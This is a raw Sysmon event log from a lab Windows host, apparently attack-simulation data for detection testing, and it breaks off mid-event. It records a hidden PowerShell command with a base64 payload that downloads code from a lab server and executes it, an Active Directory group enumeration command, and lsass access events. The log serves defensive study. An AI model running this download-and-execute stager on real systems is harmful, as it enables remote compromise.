22:00:05.667{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.667{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-83E5-613A-E696-03000000C801}5496C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.667{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-83E5-613A-E696-03000000C801}5496C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035128801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.672{B81B27B7-83E5-613A-E696-03000000C801}5496C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c powershell.exe Get-ADGroup -Filter *C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035128800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.236{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23102E376C5CB03DAF12E09E9A5A36D4,SHA256=2F28FFC2DF5562A5AB8DCD855B5B8E0F2B0B37D4814A6DF2696B90C9B686A443,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:06.960{B81B27B7-4012-611D-0B00-00000000C801}6366252C:\Windows\system32\lsass.exe{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:06.960{B81B27B7-4012-611D-0B00-00000000C801}6366252C:\Windows\system32\lsass.exe{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000035128825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-09 22:00:06.876{B81B27B7-83E5-613A-E796-03000000C801}5920\PSHost.132756984056833361.5920.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000035128824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:06.861{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4CD2C802EF1CCD94B550A513F1E6D2D,SHA256=04D45F53304D485E52BA729BB4DFA401971A397FD6274B2B0B73B95BE6DAB41D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:06.861{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1C9AEED85DC960D4EE2971FCBE7470EA,SHA256=A2D4D3B4102BA1C1E10C4D65203096FAC5FF3B879A860819C9B6F6A1017C858B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:06.861{B81B27B7-83E5-613A-E796-03000000C801}5920ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_vgdmszec.dfc.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:06.845{B81B27B7-83E5-613A-E796-03000000C801}5920ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_wejl5igh.a1z.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:06.676{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0CDA9DC0BE2B441A054C31858856CBE6,SHA256=E7826D0DF8A9AFD2CDC6F62EDE524115D1542516467543123FF8379560253E3E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000035128819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:06.645{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_wejl5igh.a1z.ps12021-09-09 22:00:06.645 10341000x800000000000000035128818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:06.631{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035128817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:06.252{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=074CEE143173BB7246A15A801C181DA5,SHA256=F5969E6C9FD3FA8C9CD91364168D0B6367752129D0D225BAFC3C9A8DA1D561F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:07.907{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3829A603AB6F6953B48DDCF39665008E,SHA256=D517BF6B6E28707825852E518A0AB445AC09F6B585EC1C1092CBA133FF28B0E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:07.345{B81B27B7-4012-611D-0B00-00000000C801}6366252C:\Windows\system32\lsass.exe{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x800000000000000035128835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:31.835{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62207-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035128834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:31.397{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62206-false10.0.1.12-8000- 23542300x800000000000000035128833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:07.261{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5660DE3F80CB0352D6BC829E61AFA776,SHA256=148DD33A4F05CB1C9685E7E0A500B7EA9F2CE473F185BBA262545F759B6E3BAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:07.224{B81B27B7-4012-611D-0B00-00000000C801}6366252C:\Windows\system32\lsass.exe{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 734700x800000000000000035128831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:07.145{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000035128830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:07.145{B81B27B7-4012-611D-0B00-00000000C801}6366252C:\Windows\system32\lsass.exe{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035128829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:07.007{B81B27B7-4013-611D-1600-00000000C801}11961436C:\Windows\system32\svchost.exe{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:07.007{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035128840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:08.643{B81B27B7-83E5-613A-E796-03000000C801}5920ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:33.335{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62208-false10.0.1.14WIN-DC-1289389- 23542300x800000000000000035128838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:08.264{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3968F9CCCA7A9F0290B7E302D3CA49E,SHA256=3070858318EF2F1DFE73EFEE3C5E338902B5194EBEF50A8E4DA7AEFE0CAEF830,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:09.868{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4CD2C802EF1CCD94B550A513F1E6D2D,SHA256=04D45F53304D485E52BA729BB4DFA401971A397FD6274B2B0B73B95BE6DAB41D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:09.652{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B7F80435311EEB51EE1C73DCE296B4FD,SHA256=61F4C3A14BD6E8E96DA679424D345C1A7DEAD8D616E54FCD9ED37BAED7C3CF3A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:33.540{00000000-0000-0000-0000-000000000000}5920<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local62210-false10.0.1.14WIN-DC-1289389- 354300x800000000000000035128843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:33.410{00000000-0000-0000-0000-000000000000}5920<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local62209-false10.0.1.14WIN-DC-1289389- 23542300x800000000000000035128842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:09.269{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F292754424B006025ABBA11D3362F68,SHA256=538B9BB400B203727ACA13FCC43A264405D46882EDEEB2274786AF39564B85DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000035128841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:33.334{00000000-0000-0000-0000-000000000000}5920win-dc-128.attackrange.local0::ffff:10.0.1.14;<unknown process> 10341000x800000000000000035128875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:10.910{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-83EA-613A-E996-03000000C801}6448C:\Program 